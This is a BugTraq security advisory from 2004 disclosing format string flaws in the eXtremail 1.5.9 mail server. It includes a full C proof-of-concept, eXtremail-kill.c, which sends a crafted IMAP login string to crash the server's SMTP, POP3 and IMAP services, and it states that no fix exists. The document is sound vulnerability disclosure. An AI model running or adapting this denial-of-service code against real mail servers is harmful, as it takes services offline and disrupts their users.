BugTraq
Remote Format String Vulnerabilities in eXtremail Apr 25 2004 02:40PM
Luca Ercoli (luca e seeweb com)


Package: eXtremail

Auth: http://www.extremail.com/

Version(s): 1.5.9 (current release)

Vulnerability: Format String

What?s eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.

It includes support for virtual domains, spoofing attack ,SSL connection

and Antivirus checking.

Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,

allowing remote attackers to gain root privileges.

This security flaw can be exploited by supplying a specially crafted string

containing format specifiers to various SMTP,POP and IMAP commands.

The vulnerability has been reported to affect some previous versions

(BugTraq ID: 2908), has been reintroduced in latest version of eXtremail.

Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------

25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection -

25/04/2004 - 16:26:29 -> ----------------------------------------------

25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150

25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received

25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received

After a successful denial of service attack, eXtremail must be restarted

to regain its functionality (Smptd,Pop3d,Imapd,Remt).

Proof of Concept:

------ eXtremail-kill.c --------

/**********************************************

* Proof of Concept *

* eXtremail 1.5.x Denial of Service *

* *

* Luca Ercoli <luca.e [at] seeweb.com> *

* Seeweb http://www.seeweb.com *

* *

***********************************************/

#include <stdio.h>

#include <netdb.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#define PORT 143

#define MAXRECVSIZE 100

int main(int argc, char *argv[]);

void crash(char *host,int TYPE);

int numbytes;

void crash(char *host,int TYPE)

{

int sockfd;

char buf[MAXRECVSIZE];

struct hostent *he;

struct sockaddr_in their_addr;

char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";

if ((he=gethostbyname(host)) == NULL)

{

perror("gethostbyname");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)

{

perror("socket");

exit(1);

}

their_addr.sin_family = AF_INET;

their_addr.sin_port = htons(PORT);

their_addr.sin_addr = *((struct in_addr *)he->h_addr);

memset(&(their_addr.sin_zero), '\0', 8);

if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)

{

perror("connect");

exit(1);

}

if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)

{

perror("recv");

exit(1);

}

buf[numbytes] = '\0';

if (TYPE == 0)

{

printf("[+] Server -> %s",buf);

sleep(1);

printf("\n[!] Sending malicious packet...\n");

send(sockfd,poc, strlen(poc), 0);

sleep(1);

printf ("\n[+] Sent!\n");

}

close(sockfd);

}

int main(int argc, char *argv[])

{

printf("\n\n eXtremail 1.5.x Denial of Service \n");

printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");

if (argc != 2)

{

fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);

exit(1);

}

crash(argv[1],0);

numbytes=0;

printf ("\n[+] Checking server status ...\n");

if(!fork()) crash(argv[1],1);

sleep(5);

if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

return 0;

}

-------------------------------

Solution:

No solution available at the moment.

Credits:

--

Luca Ercoli <luca.e [at] seeweb.com>

Seeweb http://www.seeweb.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus